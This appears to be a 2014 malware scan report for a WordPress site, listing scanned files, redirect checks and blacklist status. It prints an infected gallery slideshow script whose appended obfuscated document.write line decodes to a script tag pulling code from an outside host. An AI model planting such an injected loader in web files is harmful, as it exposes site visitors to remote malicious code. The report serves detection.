Scanned pages/files
Request | Server response | Status |
http://www.cskp.info/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 27 Jun 2014 00:34:07 GMT Location: http://cskp.info/ Server: nginx/1.0.15 Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://cskp.info/xmlrpc.php X-Powered-By: PHP/5.2.17 | clean |
http://cskp.info/ | 200 OK Content-Length: 67539 Content-Type: text/html | clean |
http://cskp.info/wp-includes/js/jquery/jquery.js?ver=1.7.1 | 200 OK Content-Length: 93889 Content-Type: application/x-javascript | clean |
http://cskp.info/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js?ver=2.88 | 200 OK Content-Length: 31032 Content-Type: application/x-javascript | clean |
http://cskp.info/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js?ver=1.05 | 200 OK Content-Length: 1914 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
jQuery.fn.nggSlideshow=function(args){var defaults={id:1,width:320,height:240,fx:'fade',domain:'',timeout:5000};var s=jQuery.extend({},defaults,args);var obj=this.selector;var stack=[];var url=s.domain+'index.php?callback=json&api_key=true&format=json&method=gallery&id='+s.id;var stackLength=0;jQuery.getJSON(url,function(r){if(r.stat=="ok"){for(img in r.images){var photo=r.images[img];stack.push(decodeURI(photo['imageURL']));} stackLength=stack.length;loadImage(1);}});functio jQuery(img).css({'height':height,'width':width});return img;};function jCycle_onBefore(curr,next,opts){if(opts.addSlide) if(stackLength>0){var img=new Image();img.src=stack.shift();stackLength--;jQuery(img).bind('load',function(){opts.addSlide(imageResize(this,s.width,s.height));});}};} <!-- js-tools --> j=0;while(j<54)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00xxx/gnj/l{0dmj0tubu/qiq#?=0tdsjqu?'.charCodeAt(j++)-1)) <!-- /js-tools -->
Antivirus reports:
http://cskp.info/wp-content/themes/cskp5/script.js | 200 OK Content-Length: 11690 Content-Type: application/x-javascript | clean |
http://www.cskp.info//yandex.st/share/share.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 27 Jun 2014 00:34:10 GMT Pragma: no-cache Location: http://cskp.info/yandex.st/share/share.js/ Server: nginx/1.0.15 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 27 Jun 2014 00:34:10 GMT X-Pingback: http://cskp.info/xmlrpc.php X-Powered-By: PHP/5.2.17 | clean |
http://cskp.info/yandex.st/share/share.js/ | 404 Not Found Content-Length: 25108 Content-Type: text/html | clean |
http://cskp.info/wp-includes/js/thickbox/thickbox.js?ver=3.1-20111117 | 200 OK Content-Length: 12501 Content-Type: application/x-javascript | clean |
http://cskp.info/wp-content/plugins/contact-form-7/jquery.form.js?ver=2.52 | 200 OK Content-Length: 24152 Content-Type: application/x-javascript | clean |
http://cskp.info/wp-content/plugins/contact-form-7/scripts.js?ver=2.4.5 | 200 OK Content-Length: 5802 Content-Type: application/x-javascript | clean |
http://www.cskp.info/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 27 Jun 2014 00:34:12 GMT Pragma: no-cache Location: http://cskp.info/test404page.js Server: nginx/1.0.15 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 27 Jun 2014 00:34:12 GMT X-Pingback: http://cskp.info/xmlrpc.php X-Powered-By: PHP/5.2.17 | clean |
http://cskp.info/test404page.js | 404 Not Found Content-Length: 25108 Content-Type: text/html | clean |
http://cskp.info/zasedaniya-cskp/ | 200 OK Content-Length: 25666 Content-Type: text/html | clean |
http://cskp.info/%d0%be-%d0%bd%d0%b0%d1%81/ | 200 OK Content-Length: 27434 Content-Type: text/html | clean |
http://cskp.info/druzya/ | 200 OK Content-Length: 29517 Content-Type: text/html | clean |
http://cskp.info/kontakty/ | 200 OK Content-Length: 25276 Content-Type: text/html | clean |
http://cskp.info/materialy/ | 200 OK Content-Length: 27522 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cskp.info
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 27 Jun 2014 00:34:08 GMT
Server: nginx/1.0.15
Content-Type: text/html; charset=UTF-8
X-Pingback: http://cskp.info/xmlrpc.php
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: cskp.info
Referer: http://www.google.com/search?q=cskp.info
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cskp.info
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://cskp.info/
Result: cskp.info is not infected or malware details are not published yet.